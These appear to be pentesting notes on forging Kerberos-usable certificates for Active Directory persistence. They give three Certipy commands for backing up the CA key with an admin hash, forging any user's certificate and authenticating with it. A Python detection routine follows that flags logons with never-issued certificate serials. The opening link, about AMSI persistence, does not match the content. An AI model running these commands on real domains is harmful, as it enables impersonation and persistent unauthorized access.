https://pentestlab.blog/2021/05/17/persistence-amsi/
This is a technique for domain persistence after compromising the CA server or domain. It’s an alternative to “Golden Tickets”, but instead of forging tickets, you can forge certificates that can be used for Kerberos authentication.
Once you have DA access on a domain, create a master certificate using:
Certipy.py ca 'domain/[email protected]' -hashes :administratorntlmhash -backup
Then you can forge a certificate for any user using:
certipy.py forge -ca-pfx 'administrator.pfx' -subject 'DC=corp,DC=local,CN=Users,CN=John' -alt '[email protected]'
And authenticate using the forged cert:
Certipy.py auth -pfx 'john.pfx'
Resource: https://research.ifcr.dk/certipy-2-0-bloodhound-new-escalations-shadow-credentials-golden-certificates-and-more-34d1c26f0dc6
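From the defender's side, a certificate forged offline with the CA's private key never passes through the CA, so its serial number has no entry in the CA's issued-certificates database. The following is an added example (not from these notes or from Certipy) that checks exported Kerberos 4768 events against an export of issued serial numbers; the dictionary layout, the CA name EXAMPLE-CA and all sample values are constructed assumptions.

```python
import re

def normalize_serial(serial):
    """Parse a hex serial to int so case, separators and leading zeros don't matter."""
    digits = re.sub(r"[^0-9a-fA-F]", "", serial or "")
    return int(digits, 16) if digits else None

def find_unissued_cert_logons(events, issued_serials, ca_name):
    """Return 4768 events whose certificate claims ca_name as issuer but whose
    serial number is absent from that CA's list of issued certificates."""
    known = {normalize_serial(s) for s in issued_serials}
    findings = []
    for ev in events:
        if ev.get("EventID") != 4768:
            continue
        serial = normalize_serial(ev.get("CertSerialNumber"))
        if serial is None:  # password-based request, no certificate presented
            continue
        if ev.get("CertIssuerName", "").lower() != ca_name.lower():
            continue  # issued by a different CA; check it against that CA's export
        if serial not in known:
            findings.append(ev)
    return findings

# Constructed sample data (assumed export layout, not real logs).
ISSUED_SERIALS = ["61 00 00 00 03 a1 b2 c3", "6100000004d4e5f6"]
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "alice", "CertIssuerName": "",
     "CertSerialNumber": ""},
    {"EventID": 4768, "TargetUserName": "alice", "CertIssuerName": "EXAMPLE-CA",
     "CertSerialNumber": "6100000003A1B2C3"},
    {"EventID": 4768, "TargetUserName": "john", "CertIssuerName": "EXAMPLE-CA",
     "CertSerialNumber": "1F3A9C00000000AA"},
    {"EventID": 4768, "TargetUserName": "bob", "CertIssuerName": "OTHER-CA",
     "CertSerialNumber": "0BADF00D"},
    {"EventID": 4624, "TargetUserName": "john"},
]

if __name__ == "__main__":
    for ev in find_unissued_cert_logons(SAMPLE_EVENTS, ISSUED_SERIALS, "EXAMPLE-CA"):
        print("TGT requested with a certificate the CA never issued:",
              ev["TargetUserName"], ev["CertSerialNumber"])
```

The check is only as good as the issued-serial export: it has to be current and taken from the CA database itself.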
GoldenGMSA is a C# tool for abusing Group Managed Service Accounts (gMSA) in Active Directory.